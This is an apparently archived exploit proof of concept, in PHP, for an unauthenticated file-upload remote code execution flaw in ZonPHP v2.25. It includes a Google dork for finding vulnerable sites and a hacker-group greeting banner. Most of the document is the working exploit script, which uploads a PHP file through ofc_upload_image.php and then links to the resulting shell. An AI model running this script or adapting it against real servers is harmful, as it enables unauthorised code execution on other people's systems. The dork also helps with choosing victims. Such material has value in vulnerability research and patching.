40 lines
No EOL
1.1 KiB
Text
40 lines
No EOL
1.1 KiB
Text
# Exploit Title: ZonPHP V2.25 RCE Vulnerability
|
||
# Google Dork: intext:"Made by SLAPER"
|
||
# Date: 21-10-2013
|
||
# Exploit Author: Halim Cruzito
|
||
# Vendor Homepage: http://www.slaper.be
|
||
# Software Link: http://www.slaper.be/zonPHPv225.zip
|
||
# Version: v2.25
|
||
# Tested on: Windows 7
|
||
|
||
# PoC:
|
||
|
||
<?php
|
||
|
||
$url = "http://server/";
|
||
$path = "ofc/ofc_upload_image.php?name=";
|
||
$filename = "up.php";
|
||
$data = "<?php phpinfo(); ?>";
|
||
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",<2C>
|
||
"Content-Type: text/plain");
|
||
|
||
|
||
$rc = curl_init();
|
||
curl_setopt($rc, CURLOPT_URL, $url.$path.$filename);
|
||
curl_setopt($rc, CURLOPT_HTTPHEADER, $headers);
|
||
curl_setopt($rc, CURLOPT_POST, 1);
|
||
curl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1);
|
||
curl_setopt($rc, CURLOPT_POSTFIELDS, $data);
|
||
curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);
|
||
$ex = curl_exec($rc);
|
||
curl_close($rc);<3B>
|
||
|
||
$shelllink = ''.$url.''.$filename.'';
|
||
echo '<a href="'.$shelllink.'" target="blank">Exploited Click Here!</a>';
|
||
|
||
?>
|
||
|
||
|
||
<EFBFBD>===============================================
|
||
|Loveto:Karoxx Puyoo ^^ and all Malaysian HaXor |
|
||
<EFBFBD>=============================================== |